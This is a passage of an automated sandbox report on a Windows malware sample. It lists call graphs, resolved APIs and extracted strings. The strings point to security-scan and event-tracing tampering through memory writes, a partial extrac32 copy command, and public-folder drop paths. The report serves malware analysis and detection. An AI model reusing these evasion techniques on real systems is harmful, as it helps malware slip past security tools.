calls 27118->27119 27120 29266f8 27119->27120 27121 290480c 11 API calls 27120->27121 27122 2926719 27121->27122 27123 2904798 11 API calls 27122->27123 27124 2926750 27123->27124 27125 2917df4 23 API calls 27124->27125 27126 2926774 27125->27126 27127 2917df4 23 API calls 27126->27127 27128 29267a7 27127->27128 27129 2917df4 23 API calls 27128->27129 27130 29267da 27129->27130 27131 2917df4 23 API calls 27130->27131 27132 292680d 27131->27132 27133 2917df4 23 API calls 27132->27133 27134 2926840 27133->27134 27135 2917df4 23 API calls 27134->27135 27136 2926873 27135->27136 27137 2917df4 23 API calls 27136->27137 27138 29268a6 27137->27138 27139 2917df4 23 API calls 27138->27139 27140 29268d9 27139->27140 27141 290480c 11 API calls 27140->27141 27142 29268fa 27141->27142 27143 2904798 11 API calls 27142->27143 27144 2926931 27143->27144 27145 2917df4 23 API calls 27144->27145 27146 2926955 27145->27146 27147 290480c 11 API calls 27146->27147 27148 2926976 27147->27148 27149 2904798 11 API calls 27148->27149 27150 29269ad 27149->27150 27151 2917df4 23 API calls 27150->27151 27152 29269d1 27151->27152 27153 290480c 11 API calls 27152->27153 27154 29269f2 27153->27154 27155 2904798 11 API calls 27154->27155 27156 2926a29 27155->27156 27157 2917df4 23 API calls 27156->27157 27158 2926a4d 27157->27158 27159 2917df4 23 API calls 27158->27159 27160 2926a80 27159->27160 27161 2917df4 23 API calls 27160->27161 27162 2926ab3 27161->27162 27163 2917df4 23 API calls 27162->27163 27164 2926ae6 27163->27164 27165 2917df4 23 API calls 27164->27165 27166 2926b19 27165->27166 27167 2917df4 23 API calls 27166->27167 27168 2926b4c 27167->27168 27169 2917df4 23 API calls 27168->27169 27170 2926b7f 27169->27170 27171 2917df4 23 API calls 27170->27171 27172 2926bb2 27171->27172 27173 2917df4 23 API calls 27172->27173 27174 2926be5 27173->27174 27175 2917df4 23 API calls 27174->27175 27176 2926c18 27175->27176 27177 2917df4 23 API calls 27176->27177 27178 2926c4b 27177->27178 27179 2917df4 23 API calls 27178->27179 27180 2926c7e 27179->27180 27181 2917df4 23 API calls 27180->27181 27182 2926cb1 27181->27182 27183 2917df4 23 API calls 27182->27183 27184 2926ce4 27183->27184 27185 2917df4 23 API calls 27184->27185 27186 2926d17 27185->27186 27187 2917df4 23 API calls 27186->27187 27188 2926d4a 27187->27188 27189 2917df4 23 API calls 27188->27189 27190 2926d7d 27189->27190 27191 2917df4 23 API calls 27190->27191 27192 2926db0 27191->27192 27193 2917df4 23 API calls 27192->27193 27194 2926de3 27193->27194 27195 2917df4 23 API calls 27194->27195 27196 2926e16 27195->27196 27197 290480c 11 API calls 27196->27197 27198 2926e37 27197->27198 27199 2904798 11 API calls 27198->27199 27200 2926e6e 27199->27200 27201 2917df4 23 API calls 27200->27201 27202 2926e92 27201->27202 27203 290480c 11 API calls 27202->27203 27204 2926eb3 27203->27204 27205 2904798 11 API calls 27204->27205 27206 2926eea 27205->27206 27207 2917df4 23 API calls 27206->27207 27208 2926f0e 27207->27208 27209 290480c 11 API calls 27208->27209 27210 2926f2f 27209->27210 27211 2904798 11 API calls 27210->27211 27212 2926f66 27211->27212 27213 2917df4 23 API calls 27212->27213 27214 2926f8a ExitProcess 27213->27214 27215->26858 27217 2904958 27216->27217 27218 2904993 27217->27218 27219 2904570 11 API calls 27217->27219 27218->26935 27220 290496f 27219->27220 27220->27218 27242 2902c2c 11 API calls 27220->27242 27223 2917d17 GetCurrentProcess 27222->27223 27224 2917ccf GetProcAddress 27222->27224 27223->26995 27225 2917ce9 NtWriteVirtualMemory 27224->27225 27226 2917d0c FreeLibrary 27224->27226 27225->27226 27227 2917d0a 27225->27227 27226->27223 27227->27226 27232 291d1b5 27228->27232 27229 291d1e1 27231 29044ac 11 API calls 27229->27231 27233 291d1f6 27231->27233 27232->27229 27243 2904694 11 API calls 27232->27243 27244 2904500 11 API calls 27232->27244 27233->26806 27236 290494c 27235->27236 27237 2907e12 GetFileAttributesA 27236->27237 27238 2907e1d 27237->27238 27238->26850 27238->26852 27239->26926 27240->26850 27241->26744 27242->27218 27243->27232 27244->27232 27245 2901a8f 27246 2901aa1 27245->27246 27258 290170d 27245->27258 27247 2901aa7 27246->27247 27251 2901b13 Sleep 27246->27251 27248 2901ab0 27247->27248 27254 2901b4b Sleep 27247->27254 27257 2901b81 27247->27257 27249 2901c66 27250 29016e8 27261 2901644 Sleep Sleep 27250->27261 27251->27247 27253 2901b2d Sleep 27251->27253 27253->27246 27255 2901b61 Sleep 27254->27255 27254->27257 27255->27247 27256 29016f5 VirtualFree 27256->27258 27259 2901c00 VirtualFree 27257->27259 27260 2901ba4 27257->27260 27258->27245 27258->27247 27258->27249 27258->27250 27261->27256
                                                                APIs
                                                                  • Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
                                                                  • Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
                                                                  • Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43
                                                                  • Part of subcall function 02907E08: GetFileAttributesA.KERNEL32(00000000,?,0291E18C,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanString,0293F358,029272FC,UacScan,0293F358,029272FC,UacInitialize), ref: 02907E13
                                                                  • Part of subcall function 0290C2DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,0291E4BE,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession), ref: 0290C2F3
                                                                  • Part of subcall function 0291C7B8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C7F3
                                                                  • Part of subcall function 0291C7B8: NtOpenFile.NTDLL(?,00100001,?,?,00000001,00000020), ref: 0291C823
                                                                  • Part of subcall function 0291C7B8: NtQueryInformationFile.NTDLL(?,?,?,00000018,00000005), ref: 0291C838
                                                                  • Part of subcall function 0291C7B8: NtReadFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C864
                                                                  • Part of subcall function 0291C7B8: NtClose.NTDLL(?), ref: 0291C86D
                                                                  • Part of subcall function 02907E2C: GetFileAttributesA.KERNEL32(00000000,?,02921221,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanBuffer,0293F358,029272FC,ScanString), ref: 02907E37
                                                                  • Part of subcall function 02907FC0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02921412,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,Initialize,0293F358,029272FC,ScanString,0293F358,029272FC), ref: 02907FCD
                                                                • WinExec.KERNEL32(00000000,029276CC), ref: 029226D9
                                                                  • Part of subcall function 0291C6D4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
                                                                  • Part of subcall function 0291C6D4: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
                                                                  • Part of subcall function 0291C6D4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
                                                                  • Part of subcall function 0291C6D4: NtClose.NTDLL(?), ref: 0291C783
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: File$Path$Name$AttributesCloseCreateModuleName_$AddressDirectoryExecHandleInformationLibraryLoadOpenProcQueryReadWrite
                                                                • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust$`&
                                                                • API String ID: 2999406049-1800652215
                                                                • Opcode ID: 7868246980ab352d5380060cb0dcef452eab72b2c054726aa0d727ac3ef11799
                                                                • Instruction ID: 4ab2069da751d5cfa39791871ff1d468fe4a5ca5ddc7e7e5a8a0041073c8092b
                                                                • Opcode Fuzzy Hash: 7868246980ab352d5380060cb0dcef452eab72b2c054726aa0d727ac3ef11799
                                                                • Instruction Fuzzy Hash: 0A042B35A1116D8FDB10EBA4DDC0AEDB3F6AFC5314F1054E2E508A7298DE70AE998F41

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 4280 292431e-292470d call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904898 4395 2924713-2924d32 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2902ee0 call 2902f08 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 GetCurrentProcess call 2917924 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 4280->4395 4396 2924f4a-29250cd call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904898 4280->4396 4924 2924d34-2924d37 4395->4924 4925 2924d39-2924f45 call 29049a4 call 291c898 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 EnumSystemLocalesA GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 4395->4925 4486 29250d3-29250e2 call 2904898 4396->4486 4487 292589e-2926f8c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 * 16 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 ExitProcess 4396->4487 4486->4487 4494 29250e8-29253bb call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 291d190 call 290480c call 290494c call 29046a4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2907e08 4486->4494 4737 29253c1-2925693 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 291cde8 call 2904500 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904d8c * 2 call 2904734 call 291c6d4 4494->4737 4738 2925698-2925899 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29049a4 call 2918170 4494->4738 4737->4738 4738->4487 4924->4925 4925->4396
                                                                APIs
                                                                  • Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
                                                                  • Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
                                                                  • Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43
                                                                  • Part of subcall function 02902EE0: QueryPerformanceCounter.KERNEL32 ref: 02902EE4
                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC), ref: 02924B9B
                                                                  • Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
                                                                  • Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
                                                                  • Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957
                                                                • EnumSystemLocalesA.KERNELBASE(00000000,00000000), ref: 02924ECD
                                                                • GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924ED2
                                                                • GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924EE6
                                                                • GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924EFA
                                                                  • Part of subcall function 02917CA8: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize,0293F384,02919CD0,UacScan), ref: 02917CBC
                                                                  • Part of subcall function 02917CA8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02917CD6
                                                                  • Part of subcall function 02917CA8: NtWriteVirtualMemory.NTDLL(00000000,00000000,0293F368,00000001,0293F374), ref: 02917CFC
                                                                  • Part of subcall function 02917CA8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize), ref: 02917D12
                                                                • GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924F0E
                                                                • GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924F22
                                                                • GetCurrentProcess.KERNEL32(ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan,0293F358,029272FC,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,UacScan), ref: 02924F36
                                                                  • Part of subcall function 02907E08: GetFileAttributesA.KERNEL32(00000000,?,0291E18C,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanString,0293F358,029272FC,UacScan,0293F358,029272FC,UacInitialize), ref: 02907E13
                                                                  • Part of subcall function 0291C6D4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
                                                                  • Part of subcall function 0291C6D4: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
                                                                  • Part of subcall function 0291C6D4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
                                                                  • Part of subcall function 0291C6D4: NtClose.NTDLL(?), ref: 0291C783
                                                                • ExitProcess.KERNEL32(00000000,ScanBuffer,0293F358,029272FC,OpenSession,0293F358,029272FC,Initialize,0293F358,029272FC,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC), ref: 02926F8C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Process$Current$AddressFileLibraryProc$HandleLoadMemoryModulePathVirtualWrite$AllocateAttributesCloseCounterCreateEnumExitFreeLocalesNameName_PerformanceQuerySystem
                                                                • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                • API String ID: 1231712556-1690217862
                                                                • Opcode ID: aebb87f0468f99e5dd54e222b418f8e2f73fa76c888720642b740e14ed830989
                                                                • Instruction ID: bdf0b482a9fc222535f517a033dac7f427fda0c66c3c747f5e0ef3d971b384ba
                                                                • Opcode Fuzzy Hash: aebb87f0468f99e5dd54e222b418f8e2f73fa76c888720642b740e14ed830989
                                                                • Instruction Fuzzy Hash: 1233FC35A1016D8FDB10EBE4CDC09EEB3F6AFC5314F1054E2E508A7698DA70AE998F51

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5579 291a4dc-291a4df 5580 291a4e4-291a4e9 5579->5580 5580->5580 5581 291a4eb-291abe9 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2917a4c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 GetModuleHandleW GetProcAddress call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 NtOpenProcess call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2902ee0 call 2902f08 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 5580->5581 5812 291c16a-291c3c2 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2917ca8 * 3 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2917ca8 * 6 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 5581->5812 5813 291abef-291ad69 GetCurrentProcess call 2917924 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 5581->5813 5958 291c3c7-291c404 call 29044d0 * 3 5812->5958 5813->5812 5905 291ad6f-291ad9f call 291586c IsBadHugeReadPtr 5813->5905 5905->5812 5918 291ada5-291adaa 5905->5918 5918->5812 5920 291adb0-291adcc IsBadHugeReadPtr 5918->5920 5920->5812 5922 291add2-291addb 5920->5922 5922->5812 5924 291ade1-291ae07 5922->5924 5924->5812 5925 291ae0d-291af86 GetCurrentProcess call 2917924 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 5924->5925 5925->5812 5994 291af8c-291b102 call 2917924 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 5925->5994 6039 291b108-291b378 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 291a368 call 290480c call 